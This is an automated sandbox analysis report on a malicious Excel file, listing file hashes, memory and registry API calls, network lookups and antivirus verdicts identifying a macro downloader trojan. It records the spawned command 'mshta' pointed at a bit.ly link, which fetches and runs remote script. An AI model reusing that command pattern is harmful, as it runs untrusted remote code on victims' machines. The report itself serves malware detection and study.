Summary | ZeroBOX

1.xls

Category Machine Started Completed
FILE s1_win7_x6401 Oct. 28, 2021, 9:54 a.m. Oct. 28, 2021, 9:57 a.m.
Size 35.5KB
Type Microsoft Excel 2007+
MD5 b1de71a7369b8398d18708df20890588
SHA256 83faecbef924ffbcce0c8939e5b9b4c453699df1cbbebaf11bdb43e8fa42d63e
CRC32 775F1CC1
ssdeep 768:snpoHrkdP32KMgh4p352TRd4i+oufgh8MUpk6TkVQiW:snOHrOPGKbh4X2TDz+ouIGMUpk64Oj
Yara None matched

Name Response Post-Analysis Lookup
www.bitly.com 67.199.248.14
IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dce1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dd3f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dd3f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dc81000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x65001000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x732d1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2072
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x058a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2072
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x058a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2072
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x058b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2072
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x058c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f492000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\~$1.xls
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x000003a8
filepath: C:\Users\test22\AppData\Local\Temp\~$1.xls
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$1.xls
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
cmdline mshta https://www.bitly.com/kddjkodwkwdokdwi
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x000002c8
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
parent_process excel.exe martian_process mshta https://www.bitly.com/kddjkodwkwdokdwi
Lionic Trojan.MSOffice.SLoad.a!c
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.37870613
McAfee RDN/Generic Downloader.x
Cyren X97M/Downldr
Symantec CL.Downloader!gen87
ESET-NOD32 a variant of Generik.GCDOHAC
Avast SNH:Script [Dropper]
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.GenericKD.37870613
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
Tencent Mac.Trojan.Macrov.Pfte
Ad-Aware Trojan.GenericKD.37870613
McAfee-GW-Edition BehavesLike.Downloader.nc
FireEye Trojan.GenericKD.37870613
Emsisoft Trojan.GenericKD.37870613 (B)
Ikarus Win32.SuspectCrc
GData Macro.Trojan.Agent.IZNZ5A
Avira HEUR/Macro.Downloader.MRKI.Gen
Microsoft TrojanDownloader:O97M/Obfuse.PLM!MTB
ZoneAlarm HEUR:Trojan-Downloader.MSOffice.SLoad.gen
Cynet Malicious (score: 99)
MAX malware (ai score=89)
Fortinet VBA/Dloader.MRKI!tr
AVG SNH:Script [Dropper]